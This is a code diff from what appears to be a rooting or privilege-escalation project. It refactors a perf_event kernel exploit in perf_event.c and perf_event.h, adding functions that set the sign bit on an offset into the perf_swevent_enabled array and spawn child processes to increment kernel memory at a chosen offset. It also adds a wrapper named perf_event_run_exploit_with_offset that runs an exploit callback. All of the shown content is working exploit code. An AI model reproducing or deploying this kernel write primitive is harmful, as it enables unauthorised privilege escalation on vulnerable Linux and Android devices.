Add some functions which can be used with offset value

Author: Hiroyuki Ikezoe

perf_event.c

@@ -200,19 +200,11 @@ prepare_pipes(int *read_fd)
 }
 
 static pid_t
-increment_address_value_in_child_process(unsigned long int address, int count, int *child_fd)
+increment_value_at_offset_in_child_process(int offset, int count, int *child_fd)
 {
-  unsigned long int perf_swevent_enabled;
-  int offset;
   int i = 0;
   pid_t pid;
 
-  perf_swevent_enabled = get_perf_swevent_enabled_address();
-  if (!perf_swevent_enabled) {
-    return -1;
-  }
-
-  offset = (int)(address - perf_swevent_enabled) / 4;
   offset |= 0x80000000;
 
   pid = prepare_pipes(child_fd);
@@ -225,6 +217,24 @@ increment_address_value_in_child_process(unsigned long int address, int count, i
   return pid;
 }
 
+static pid_t
+increment_address_value_in_child_process(unsigned long int address, int count, int *child_fd)
+{
+  unsigned long int perf_swevent_enabled;
+  int offset;
+  int i = 0;
+  pid_t pid;
+
+  perf_swevent_enabled = get_perf_swevent_enabled_address();
+  if (!perf_swevent_enabled) {
+    return -1;
+  }
+
+  offset = (int)(address - perf_swevent_enabled) / 4;
+
+  return increment_value_at_offset_in_child_process(offset, count, child_fd);
+}
+
 #define MIN(x,y) (((x)<(y))?(x):(y))
 #define BUFFER_SIZE 5
 int
@@ -256,6 +266,33 @@ perf_event_write_value_at_address(unsigned long int address, int value)
   return current_process_number;
 }
 
+int
+perf_event_write_value_at_offset(int offset, int value)
+{
+  int number_of_children;
+
+  current_process_number = 0;
+  number_of_children = value / PERF_SWEVENT_MAX_FILE + 1;
+  child_process = (pid_t*)malloc(number_of_children * sizeof(pid_t));
+
+  while (value > 0) {
+    char buffer[BUFFER_SIZE];
+    int child_fd;
+    int min = MIN(value, PERF_SWEVENT_MAX_FILE);
+    pid_t pid = increment_value_at_offset_in_child_process(offset, min, &child_fd);
+    if (pid <= 0) {
+      return (int)pid;
+    }
+    read(child_fd, buffer, sizeof(buffer));
+    close(child_fd);
+    child_process[current_process_number] = pid;
+    current_process_number++;
+    value -= PERF_SWEVENT_MAX_FILE;
+  }
+
+  return current_process_number;
+}
+
 void
 perf_event_reap_child_process(int number)
 {
@@ -300,6 +337,31 @@ perf_event_run_exploit(unsigned long int address, int value,
   return success;
 }
 
+bool
+perf_event_run_exploit_with_offset(int offset, int value,
+                                   bool(*exploit_callback)(void* user_data), void *user_data)
+{
+  int number_of_children;
+  bool success;
+
+  number_of_children = perf_event_write_value_at_offset(offset, value);
+  if (number_of_children < 0) {
+    return false;
+  }
+
+  if (number_of_children == 0) {
+    while (true) {
+      sleep(1);
+    }
+  }
+
+  success = exploit_callback(user_data);
+
+  perf_event_reap_child_process(number_of_children);
+
+  return success;
+}
+
 /*
 vi:ts=2:nowrap:ai:expandtab:sw=2
 */

perf_event.h

@@ -21,9 +21,12 @@
 #include <stdbool.h>
 
 int perf_event_write_value_at_address(unsigned long int address, int value);
+int perf_event_write_value_at_offset(int offset, int value);
 void perf_event_reap_child_process(int number_of_children);
 bool perf_event_run_exploit(unsigned long int address, int value,
                             bool(*exploit_callback)(void* user_data), void *user_data);
+bool perf_event_run_exploit_with_offset(int offset, int value,
+                                   bool(*exploit_callback)(void* user_data), void *user_data);
 
 #endif /* PERF_EVENT_H */
 /*